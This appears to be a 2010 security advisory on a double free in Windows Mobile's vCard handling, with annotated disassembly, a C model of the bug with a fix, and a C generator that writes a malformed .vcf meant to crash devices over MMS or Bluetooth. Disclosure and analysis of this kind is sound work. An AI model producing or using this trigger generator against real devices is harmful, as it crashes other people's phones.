Windows Mobile 6.1 and 6.5 Double Free Denial of Service
Source: celilunuver[n0sp4m]gmail.com  Author: musashi  Published: 2010-10-25

Vendor: Microsoft
Product: Windows Mobile (6.1 and 6.5)
Vulnerability: Double Free Denial of Service
Tested vulnerable versions: Windows Mobile 6.1 and 6.5
Tested on: HTC Touch (WM 6.1), HTC Touch2 (WM 6.5)
CREDITS: Celil Ünüver from SecurityArchitect.Org
CONTACT: celilunuver[n0sp4m]gmail.com

Vulnerability Details and Analysis:

The vulnerability is a double free. It occurs when multiple buffers are allocated to handle a very large Name (N) field in a vCard (.vcf) file. Such a file can be delivered to the device by MMS or Bluetooth.
After the malformed .vcf file is opened, an error dialog appears; the buffers are then freed and the process crashes:

pimutil.dll:

.text:02B73DE0 sub_2B73DE0                             ; CODE XREF: sub_2B74388+1Cp
.text:02B73DE0       STMFD   SP!, {R4,LR}
.text:02B73DE4       MOV     R4, R0
.text:02B73DE8       LDR     R2, [R4,#0xC]
.text:02B73DEC       LDR     R3, =off_2B66DB8
.text:02B73DF0       CMP     R2, #0
.text:02B73DF4       LDRNE   R0, [R4,#8]
.text:02B73DF8       STR     R3, [R4]
.text:02B73DFC       BLNE    sub_2BA6350
.text:02B73E00       LDR     R0, [R4,#8]
.text:02B73E04       BL      sub_2BA56F8 ; SysFreeString
.text:02B73E08       LDR     R0, [R4,#0x14]          ; first free of [R4+0x14]
.text:02B73E0C       BL      sub_2BA56F8 ; SysFreeString
.text:02B73E10       LDR     R0, [R4,#0x14]          ; DOUBLE FREE: same pointer loaded again
.text:02B73E14       BL      sub_2BA56F8 ; SysFreeString
.text:02B73E18       LDR     R0, [R4,#8]
.text:02B73E1C       BL      sub_2BA56F8 ; SysFreeString
.text:02B73E20       LDR     R3, =(dword_2B66D30+8)
.text:02B73E24       STR     R3, [R4]
.text:02B73E28       LDMFD   SP!, {R4,LR}
.text:02B73E2C       BX      LR

As you can see, the pointer at [R4+0x14] is passed to SysFreeString() twice. None of the fields is written back to the object between the calls, so the second LDR picks up the stale pointer. (The same listing also loads [R4+8] and passes it to the same routine at 02B73E04 and again at 02B73E1C.)

.text:0271E4C0 SysFreeString                           ; CODE XREF: sub_271AE68+1Cp
.text:0271E4C0                                         ; sub_271AE68+24p ...
.text:0271E4C0                 STMFD   SP!, {R4,LR}
.text:0271E4C4                 CMP     R0, #0
.text:0271E4C8                 BEQ     loc_271E508
.text:0271E4CC                 LDR     R3, =0x1ECD1B8
.text:0271E4D0                 SUB     R4, R0, #8
.text:0271E4D4                 LDR     R0, [R3]
.text:0271E4D8                 BL      sub_27391B8
.text:0271E4DC                 CMP     R0, #0
.text:0271E4E0                 BNE     loc_271E4F4
.text:0271E4E4                 MOV     R0, R4
.text:0271E4E8                 BL      sub_2739168
.text:0271E4EC                 LDMFD   SP!, {R4,LR}
.text:0271E4F0                 BX      LR
.text:0271E4F4 ; ---------------------------------------------------------------------------
.text:0271E4F4
.text:0271E4F4 loc_271E4F4                             ; CODE XREF: SysFreeString+20j
.text:0271E4F4                 LDR     R3, [R4]        ; CRASH
.text:0271E4F8                 MOV     R1, R4
.text:0271E4FC                 ADD     R3, R3, #0x19
.text:0271E500                 BIC     R2, R3, #0xF
.text:0271E504                 BL      sub_27295BC
.text:0271E508

The code at 0271E4F4 is attempting to read the 'size' from the heap chunk header: R4 was set to R0 - 8 at 0271E4D0, i.e. the header that precedes the string data. On the second call that header belongs to a chunk the first call already released, so the load faults. Note that SysFreeString does return early on a NULL argument (0271E4C4), but that check never helps here because the caller never clears the field after the first free.
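The call sequence of the listing above, reduced to C as an added example (this is not code from the advisory or from pimutil.dll): a struct with the fields at the offsets the listing uses, an instrumented stand-in for SysFreeString that reports a second free of the same string instead of reading a released header, and the destructor written twice, once exactly as the listing calls it and once freeing each field a single time and clearing it. The 8-byte header layout, the field names and the bookkeeping allocator are assumptions made for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the advisory or from pimutil.dll.
 * Models the destructor at 02B73DE0 and SysFreeString, instrumented so
 * that a second free of the same string is reported rather than
 * crashing.  The 8-byte header mirrors "SUB R4, R0, #8"; its content
 * and the live-table bookkeeping are assumptions of this model. */

#define HDR 8
#define MAX_LIVE 16

/* Headers of strings that are currently allocated. */
static uintptr_t live[MAX_LIVE];

static char *model_SysAllocString(const char *s)
{
    size_t n = strlen(s) + 1;
    char *hdr = malloc(HDR + n);
    if (!hdr) return NULL;
    memcpy(hdr, &n, sizeof n);              /* header holds the size */
    memcpy(hdr + HDR, s, n);
    for (int i = 0; i < MAX_LIVE; i++)
        if (!live[i]) { live[i] = (uintptr_t)hdr; return hdr + HDR; }
    free(hdr);
    return NULL;
}

/* Returns 1 on a double free (on the device: the fault at 0271E4F4),
 * 0 otherwise.  NULL is a no-op, as in the real routine (CMP R0,#0 / BEQ). */
static int model_SysFreeString(char *p)
{
    if (!p) return 0;
    uintptr_t hdr = (uintptr_t)(p - HDR);   /* SUB R4, R0, #8 */
    for (int i = 0; i < MAX_LIVE; i++)
        if (live[i] == hdr) { live[i] = 0; free((void *)hdr); return 0; }
    return 1;                               /* header already released */
}

struct pim_obj {
    const void *vtbl;   /* [R4]      */
    unsigned    f4;     /* [R4+4]    */
    char       *f8;     /* [R4+8]    */
    unsigned    fc;     /* [R4+0xC]  */
    unsigned    f10;    /* [R4+0x10] */
    char       *f14;    /* [R4+0x14] */
};

/* Call order of the listing: [R4+8], [R4+0x14], [R4+0x14], [R4+8].
 * Returns how many of those calls were double frees. */
static int destroy_vulnerable(struct pim_obj *o)
{
    int dup = 0;
    dup += model_SysFreeString(o->f8);
    dup += model_SysFreeString(o->f14);
    dup += model_SysFreeString(o->f14);
    dup += model_SysFreeString(o->f8);
    return dup;
}

/* Hardened: release each field once and clear it, so that the NULL
 * check inside SysFreeString turns any repeated call into a no-op. */
static int destroy_fixed(struct pim_obj *o)
{
    int dup = 0;
    dup += model_SysFreeString(o->f8);  o->f8 = NULL;
    dup += model_SysFreeString(o->f14); o->f14 = NULL;
    /* the second pass the listing performs is now harmless */
    dup += model_SysFreeString(o->f14);
    dup += model_SysFreeString(o->f8);
    return dup;
}

static struct pim_obj make_obj(void)
{
    struct pim_obj o = {0};
    o.f8  = model_SysAllocString("family");   /* constructed sample data */
    o.f14 = model_SysAllocString("given");
    return o;
}

int main(void)
{
    struct pim_obj a = make_obj();
    printf("as listed: %d double free(s)\n", destroy_vulnerable(&a));
    struct pim_obj b = make_obj();
    printf("fixed:     %d double free(s)\n", destroy_fixed(&b));
    return 0;
}
```

The fixed variant relies only on behaviour visible in the listing: SysFreeString already returns when R0 is zero, so writing NULL back into the object after the first release is enough; the original destructor never stores to [R4+8] or [R4+0x14], which is why the second LDR reloads the dangling pointer.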

Exploiting:

Double frees are usually exploitable, but in this case it does not look simple: the two calls to free occur in immediate succession, so there is no window in which the chunk could be reallocated between them. WinCE supports multi-threading, but racing a window that small would be extremely hard. I do not have deep knowledge of the WinCE heap structures, so for now this is a denial of service, but I think exploiting this vulnerability may be possible (impossible is nothing! :P).


Proof of Concept:

http://www.exploit-db.com/application/15297
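A generator for the trigger the advisory describes, as an added example that is not the linked PoC: it builds a vCard 2.1 whose N field is filled far beyond any realistic name length and writes it to a file for delivery over MMS or Bluetooth. The 64 KiB default, the 'A' fill byte, the VERSION/FN lines and the file name are assumptions; the advisory gives only the shape of the input (a very large N field), not the exact length at which the double free occurs.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the advisory's PoC.  Builds a vCard with an
 * oversized N (structured name) field.  Length, fill byte and the
 * surrounding lines are assumptions. */

/* Writes the vCard into buf (at most cap bytes, NUL-terminated).
 * Returns its length, or 0 if buf is too small. */
static size_t build_vcf(char *buf, size_t cap, size_t name_len)
{
    static const char head[]   = "BEGIN:VCARD\r\nVERSION:2.1\r\n";
    static const char n_tag[]  = "N:";
    static const char n_tail[] = ";;;;\r\n";   /* family;given;additional;prefix;suffix */
    static const char tail[]   = "FN:test\r\nEND:VCARD\r\n";
    size_t need = strlen(head) + strlen(n_tag) + name_len
                + strlen(n_tail) + strlen(tail);
    if (need + 1 > cap) return 0;

    char *p = buf;
    memcpy(p, head, strlen(head));     p += strlen(head);
    memcpy(p, n_tag, strlen(n_tag));   p += strlen(n_tag);
    memset(p, 'A', name_len);          p += name_len;   /* the oversized family-name part */
    memcpy(p, n_tail, strlen(n_tail)); p += strlen(n_tail);
    memcpy(p, tail, strlen(tail));     p += strlen(tail);
    *p = '\0';
    return need;
}

/* usage: ./vcfgen [name_len] [output.vcf] */
int main(int argc, char **argv)
{
    size_t name_len = argc > 1 ? (size_t)strtoull(argv[1], NULL, 10) : 65536;
    const char *path = argc > 2 ? argv[2] : "poc.vcf";
    size_t cap = name_len + 256;
    char *buf = malloc(cap);
    if (!buf) return 1;

    size_t len = build_vcf(buf, cap, name_len);
    FILE *f = len ? fopen(path, "wb") : NULL;
    if (!f) { free(buf); return 1; }
    fwrite(buf, 1, len, f);
    fclose(f);
    printf("wrote %zu bytes to %s (N field: %zu bytes)\n", len, path, name_len);
    free(buf);
    return 0;
}
```

Start with the default size and vary the argument downward to find the smallest N field that still produces the error dialog and crash on a given device; the advisory reports the crash on WM 6.1 and 6.5 hardware and on the WM 6.5 Professional emulator.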

Vendor/Patch Status:

It's 0day :]

Actually, I contacted Microsoft, but they said:
"We fixed this issue in the WM 6.5 version and we cannot publish a bulletin for it."
But I am sure that it is not fixed in 6.5. I have tested it on several devices running WM 6.5, and also on the WM 6.5 Professional Emulator (which can be downloaded from Microsoft's pages); it crashes there too.


Last Words:
We are not dead, just busy!

Greets to: SecurityArchitect members (Ulascan), Hellcode, murderkey ...

Links:
www.securityarchitect.org
blog.securityarchitect.org

